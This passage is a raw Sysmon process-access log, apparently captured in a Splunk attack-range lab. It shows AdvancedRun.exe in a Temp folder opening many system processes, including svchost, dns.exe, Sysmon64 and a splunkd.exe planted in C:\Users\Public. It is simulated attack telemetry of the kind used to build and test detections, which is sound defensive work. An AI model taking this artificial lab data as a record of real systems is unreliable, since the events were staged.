Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.199{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.195{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.195{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 